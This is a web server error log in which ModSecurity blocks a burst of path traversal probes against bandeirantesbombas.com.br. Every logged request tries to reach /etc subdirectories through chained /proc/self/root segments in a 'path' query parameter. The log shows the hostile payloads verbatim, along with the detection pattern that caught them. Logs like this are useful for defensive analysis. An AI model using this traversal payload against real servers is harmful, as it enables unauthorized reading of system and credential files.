[Fri Mar 20 03:44:53.876181 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.243.128:36252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs5TJ3M9BSuKP7CAbf0gAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:44:55.173148 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:36268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs5-oXxyEfFpUF8f9TfQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:44:56.489641 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:36284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs6PqxLDW4GITHUkSxiAAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:00.364849 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:36498] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs7PqxLDW4GITHUkSxkgAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:01.038954 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:36292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs7RCii7xarUs8iHYz2AAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:01.839281 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:48716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs7da6ubjKNq_cu4aeEwAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:03.505473 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:51904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs79a6ubjKNq_cu4aeGAAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:04.310659 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:48732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs8OoXxyEfFpUF8f9TggAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:05.272499 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:51916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs8RCii7xarUs8iHYz2gAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:06.175585 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:48742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs8uoXxyEfFpUF8f9TgwAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:06.391730 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:48742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs8uoXxyEfFpUF8f9ThAAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:08.451440 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:51932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs9Lninkcc-iUj5AotiQAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:08.851849 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:54558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs9Na6ubjKNq_cu4aeGwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:09.843448 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:46658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs9bninkcc-iUj5AotjAAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:11.219514 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.243.128:46666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs9xCii7xarUs8iHYz3gAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:11.227285 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:54566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs9-oXxyEfFpUF8f9TigAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:12.986991 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:54584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs-OoXxyEfFpUF8f9TjAAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:13.633351 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:46676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs-RCii7xarUs8iHYz4AAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:16.920055 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.241.31:54592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs_DJ3M9BSuKP7CAbf2gAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:17.726320 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:46682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs_fqxLDW4GITHUkSxnAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:18.667155 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:57910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs_uoXxyEfFpUF8f9TjQAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
